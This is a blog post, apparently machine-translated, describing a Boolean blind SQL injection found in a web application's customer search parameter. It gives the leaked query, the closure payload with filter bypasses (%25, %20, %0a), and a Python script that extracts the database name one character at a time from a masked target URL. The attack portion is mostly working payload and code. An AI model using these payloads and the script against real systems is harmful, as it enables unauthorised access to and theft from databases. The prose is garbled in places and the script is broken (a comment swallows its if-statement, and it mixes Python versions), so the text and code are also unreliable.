PY trading with Boolean blinds injection

After the good feedback in the previous article, I happened to find this Boolean vulnerability in the project, so I wrote this article. The main format is the same, but the content is different. Next time, let’s take a look at what PY transaction is doing. let me think again.

Category: Tags: ,

Identify the problem
During this test, an injection point was found. Through the test, it was found that the return package contained sql statements, which confirmed that it could be injected and started this injection attempt.

First of all, we can confirm that this is a GET data call. I thought it was a simple error injection. It should be possible to directly use sqlmap to exploit the vulnerability, but the reality gave me a slap in the face. sqlmap can use this vulnerability at all, but my database statement actually appeared in the returned data packet, so I took out the returned database statement and started a little construction process.

The copied database statement:

SELECT count(0) FROM customer c WHERE c.dealership_id = ? AND c.active = true AND (c.full_name LIKE '%1%') AND 1 IN (1, 2) AND (c.full_name LIKE '%test%' OR c.phone_number LIKE '%1%')
 AND 1 IN (1, 2) AND (c.full_name LIKE '%test%' OR c.phone_number_sub1 LIKE '%1%') AND 1 IN (1, 2) AND (c.full_name LIKE '%test%' OR c.phone_number_sub2 LIKE '%1%') AND 1 IN 
(1, 2) AND (c.full_name LIKE '%test%')

Two, test command statement
After experiments, it is found that the error content is different, which indicates that the parameters can indeed affect the database statement. However, the returned content needs to be closed and the returned content cannot be used, so type injection forms such as error reporting can be excluded. There are only two types of injections that can be detected: time blinds and Boolean blinds are added directly after the target Test statement.

Construct the database statement:

%’){Test statement}AND(c. full_name like’%test

The return is successful, and the statement is closed (in addition, the database fuzzy query like %% is used). After testing, it is found that there is filtering. The single% cannot pass and the space cannot pass. The system will return 404. For the database statement that broke before, use% 25 and %20 bypass the filtering of individual% and spaces to construct the above database statement to complete the closure of the statement, successfully return 200, confirm that the normal data packet can be returned, and perform a Boolean blind injection test based on the correctness of the database statement .

Next, confirm the test statement

27)and%0a(ascii(substr(database(),{1},1))={0})%0aAND(c.full_name%0alike%0a%27%25test

Match in the form of bitwise interception, confirm the database name

Three, tool ideas
3.1 Post data packet utilization
Use python’s data packet sending to batch test target content

Different from time-type blind injection, Boolean blind injection needs to confirm the problem according to the difference of the returned data packet

%0a(ascii(substr(database(),{1},1))={0})%0a

Use the find function to find the returned data characteristics and determine whether the injected data is successfully obtained

# coding:utf-8
import requests
import datetime
import time

headers = {
    Header information, add by yourself
}
chars = 'abcdefghigklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ123456789@_.' 
database = ''
for j in range(1,11):
    for i in range(49,125):
        Url = 'https://xxxxxxxxxxxxxxxxxxxxxxxxxxxxx/find?pageNo=1&pageSize=20&searchWord=1%25%27)and%0a(ascii(substr(database(),{1},1))={0})%0aAND(c.full_name%0alike%0a%27%25test'
        UrlFormat = Url.format(i,j)      #format()Function usage
        r = requests.get(UrlFormat,headers=headers)
        d = r.content.find("Test")       #Use the find function to find the characteristics of the returned data and determine whether the injected data is successfully obtained if d != -1:
            print(i)
            print chr(i)
            database += chr(i)
            print database
            break
        else:
            pass

Fourth, future thoughts
For the future of the code, there are the following ideas

1. Add the function of directly calling the data package

2. Always modify the value of 0

3. Optimize the thread

4. Write the code for the GET method

5. Refactor the logic of the overall code

 

Reviews

There are no reviews yet.

Be the first to review “PY trading with Boolean blinds injection”

Your email address will not be published. Required fields are marked *